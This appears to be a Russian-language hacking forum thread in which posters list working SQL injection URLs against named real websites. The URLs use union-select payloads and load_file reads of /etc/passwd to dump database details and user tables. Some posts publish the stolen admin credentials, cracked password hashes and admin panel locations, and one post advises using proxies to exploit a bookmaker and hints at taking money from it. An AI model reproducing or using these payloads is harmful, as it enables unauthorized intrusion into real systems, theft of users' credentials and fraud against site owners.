www.icps.kiev.ua Центр какихто там исследователей "есть ли жизнь на Марсе, нет ли жизни на Марсе" Code: http://www.icps.kiev.ua/news.html?id=-1+union+select+1,version(),3,4,5/*
Code: http://www.kornid.is/fullgallery.php?id=-10+union+select+1,2,3,4,5,6,concat(password,0x3a,username),8+from+users/*&stat=sale http://www.kornid.is/admin/ pass:dagmar login:1 Code: http://www.fbjork.is/index.php?id=-483+union+select+1,2,3,version(),database(),6,7/*
http://www.swift.ru/index.php?n=1&f=5&id=-1+union+select+1,2,0x2a2a2a4441204879204841585045482a2a2a203a2d28,4,5,6,7,8,9,10/*
Code: http://www.cronica.com.mx./nota.php?id_nota=-249802+union+select+1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version())/*
http://www.fbm.ru/main.php?n=2&f=47&mt=0.27036300%201174418216&num=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11/* http://www.fbm.ru/main.php?n=2&f=47&mt=0.27036300%201174418216&num=-1+union+select+1,load_file('/tmp/ww.php'),3,4,5,6,7,8,9,10,11/*
Code: http://videos.cooltax.net/view.php?id=-163442'+union+select+1,2,3,concat(user,0x3a,password),5,database(),7,version(),9,0+from+mysql.user/* root:*CD11B1921012CA99693A28BF0D822D4E5D9E120D
Code: http://www.debtwatch.org/es/inicio/enprofunditat/plantilla_1.php?identif=-1+union+select+1,2,3,4,user(),6,version(),8,9,10,11/* Code: http://www.europa-kherson.com/news/news.php?identif=-1+union+select+1,user(),version(),4/* Code: http://www.joseepedroalmeida.com/pombosdetalhe.php?identif=-1+union+select+1,user(),version(),database(),5,6/*
onboard.ru Code: http://www.onboard.ru/talkabout/show.php?id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables/* upd: Code: http://fat-cat.co.uk/fatcat/artistInfo.php?id=-1+union+select+1,concat_ws(0x3a,username,password,email),3,4,5,6+from+users+limit+0,1/* ~500 юзеров, логин:пасс:мэйл в чистом виде, пароли от форума. есть еще доступ к таблице mysql.user, столбцы не подбирал.. etc/passwd Code: http://fat-cat.co.uk/fatcat/artistInfo.php?id=-1+union+select+1,LOAD_FILE(0x2F6574632F706173737764),3,4,5,6 upd2: название базы улыбнуло Code: http://www.superherohype.com/news/topnews.php?id=-1+union+select+database()/*
Code: http://www.isaacmizrahiny.com/slideshow.php?id=-86%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(username,0x3a,password),15,16,17,18,19,20,21,22+from+users/*
Code: http://www.vesnaupi.ru/cross/gallery.php?dep=4&gal=4&pos=&id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
www.bukmekers.com Букмекерская контора Code: http://bukmekers.com/index.php?option=com_user&task=doStakeMenu&cid=-1+union+select+1,concat(database(),char(58),user(),char(58),version())+from+INFORMATION_SCHEMA.TABLES/* 1) Скуля действует только от зарегестрированного пользователя; 2) Регестрируйте юзера только под проксями)); 3) Имена таблиц ищите только под проксями; 4) Ваш акк могут через какое-то время забанить, ну потом зареганите другой)); 5) Далее, как деньги слить думаю разберетесь. Удачи.
mssql Code: http://www.stud-info.com/shop/ozon/book/zakaz.asp?id=-1+union+all+select+1,2,3,4,5,6,table_name,8,9,10,11+from+information_schema.tables-- mysql Code: http://www.vtv.gcg.ru/konkurs/?konkurs=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version())/*
Code: http://www.onlineflashgamez.com/index.php?action=playgame&gameid=-1+union+select+1,concat_ws(0x3a,username,password,emailaddress),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+users+limit+0,1/* admin:dbc50ecb629ac64cc2fdad7bede9daf2: [email protected] dbc50ecb629ac64cc2fdad7bede9daf2 = 1qa2ws http://www.onlineflashgamez.com/admin/index.php
Code: http://state.rin.ru/cgi-bin/news.pl?id=-118107+union+select+1,2,concat_ws(char(58),name,login),4+from+users/* вот тут с табличкой пришлось напрячься=\ Code: http://shop.vashtextil.com.ua/main.php?id=-7'+union+select+1,id,3,4+from+tbl_main/*
telemir.com.ua Code: http://telemir.com.ua/news/news.html?id=-1+union+select+1,2,concat(user_name,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/* Admin:Admin мда... http://telemir.com.ua/admin - убогейшая, вообще ничего нету =(
dorian.ru Code: http://www.dorian.ru/catalog/dog.php?screen=1&id=-1+union+select+concat(name,0x3a,password),2,3,4,5,6+from+users+limit+0,1/* admin:e10adc3949ba59abbe56e057f20f883e upd: pass=123456
gostudy.com.ua нимагу больше =(( HTML: Error in query The used SELECT statements have a different number of columns Code: http://gostudy.com.ua/view.phtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102/*
вот, немножко в другом месте вывод в title http://gostudy.com.ua/forum.phtml?theme_id=-61+union+select+database()+from+users/*
Так и не подобрал таблицу с пользователями( Code: http://books.inmsk.ru/full_descript.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,convert(database(),char),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/*
